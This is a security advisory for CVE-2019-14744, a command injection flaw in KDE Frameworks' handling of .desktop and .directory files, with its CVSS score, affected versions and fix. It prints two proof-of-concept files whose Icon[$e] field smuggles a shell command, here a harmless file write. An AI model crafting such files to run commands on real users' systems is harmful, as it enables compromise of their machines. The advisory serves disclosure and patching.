#VU19947 OS Command Injection in KDE Frameworks


Published: 2019-08-07 | Updated: 2019-08-07

Vulnerability identifier: #VU19947

Vulnerability risk: High

CVSSv3.1: 7.9 [CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C]

CVE-ID: CVE-2019-14744

CWE-ID: CWE-78

Exploitation vector: Network

Exploit availability: No

Vulnerable software:
KDE Frameworks
Client/Desktop applications / Other client software

Vendor: KDE.org

Description

The vulnerability allows a remote attacker to execute arbitrary shell commands on the target system.

The vulnerability exists due to improper input validation when processing .desktop and .directory files within the KConfigGroup::readEntry() function. A remote attacker can create a specially crafted file or folder, trick the user into opening it and execute arbitrary OS commands with privileges of the current user.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Examples:

1) payload.desktop

[Desktop Entry]
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)

2) .directory

[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)

Mitigation
Update to version 5.61.0

Vulnerable software versions

KDE Frameworks: 5.2.0 - 5.60.0


External links
http://gist.githubusercontent.com/zeropwn/630832df151029cb8f22d5b6b9efaefb/raw/64aa3d30279acb207f78...
http://kde.org/info/security/advisory-20190807-1.txt


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.


Latest bulletins with this vulnerability